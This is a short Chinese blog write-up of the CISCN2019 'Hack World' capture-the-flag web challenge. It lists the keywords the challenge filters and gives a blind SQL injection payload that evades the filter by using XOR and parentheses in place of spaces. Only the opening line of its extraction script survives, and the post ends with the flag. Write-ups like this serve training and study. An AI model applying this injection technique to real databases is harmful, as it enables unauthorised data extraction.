【CISCN2019】Hack-World
[CISCN2019 华北赛区 Day2 Web1]Hack World
测试
id=1
id=2
fuzz 一下,空格/union/order by/updatexml/and/or
等字符
分析
尝试盲注,题目给出表及字段,使用异或连接,用括号代替空格0^(ascii(substr((select(flag)from(flag)),1,1))>1)
脚本
1 | import requests |
得到:flag{9dac589a-3b83-4cdc-b67f-21f89b8f7f5c}
- 标题: 【CISCN2019】Hack-World
- 作者: Itachi
- 创建于 : 2021-12-18 22:52:51
- 更新于 : 2021-12-19 00:31:11
- 链接: https://blog.tarchi.top/ctf/【CISCN2019】Hack-World/
- 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论